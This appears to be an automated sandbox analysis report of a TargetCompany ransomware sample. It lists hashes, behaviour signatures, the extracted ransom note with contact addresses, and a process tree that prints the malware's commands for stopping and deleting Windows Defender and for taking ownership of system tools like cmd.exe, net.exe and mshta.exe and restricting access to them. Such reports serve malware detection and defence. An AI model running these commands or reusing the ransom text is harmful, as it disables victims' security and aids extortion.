Resubmissions
03-02-2022 13:26
220203-qpq5cahggm 301-02-2022 11:13
220201-nbqkjsdear 1001-02-2022 11:12
220201-na5m3sdeak 1031-12-2021 08:31
211231-keqg6sggb4 10Analysis
-
max time kernel
148s -
max time network
133s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
31-12-2021 08:31
General
-
Target
ConsoleApp7.exe
-
Size
53KB
-
MD5
b2993b2a7a1edba14742564de7e85cb2
-
SHA1
cf7f1085978128cc082aec921d34d6d25e4ab19b
-
SHA256
800b4455105a08833332092017909f9dd47bd4ebfb1cbddbe0b95658d03b8d64
-
SHA512
a64951f5026a2f3bb01652bae0267b1d4b88b017a64208bb2e556a755a44e86eab0df33d43e759defe4caefc30693099b74fa1ebac90ff323ac2e555f51d892a
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\RECOVERY INFORMATION.txt
Ransom Note
YOUR FILES ARE ENCRYPTED !!!
TO DECRYPT, FOLLOW THE INSTRUCTIONS:
To recover data you need decrypt tool.
To get the decrypt tool you should:
1.In the letter include your personal ID! Send me this ID in your first email to me!
2.We can give you free test for decrypt few files (NOT VALUE) and assign the price for decryption all files!
3.After we send you instruction how to pay for decrypt tool and after payment you will receive a decryption tool!
4.We can decrypt few files in quality the evidence that we have the decoder.
CONTACT US:
[email protected]
[email protected]
YOUR PERSONAL ID: 77A2C588DF7F
�
Signatures
-
TargetCompany
Ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
-
TargetCompany Payload 7 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Nirsoft 13 IoCs
-
Executes dropped EXE 5 IoCs
-
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
-
Modifies service settings 1 TTPs
Alters the configuration of existing services.
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 10 IoCs
-
Modifies file permissions 1 TTPs 18 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 2 IoCs
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 64 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ConsoleApp7.exe"C:\Users\Admin\AppData\Local\Temp\ConsoleApp7.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 1123⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 11203⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Unctnmnxidkfrmahbwqxhbt.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Desarzwkill$.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cmd.exe /a4⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /g system:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cmd.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /g system:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net1.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a4⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a4⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"4⤵
-
-
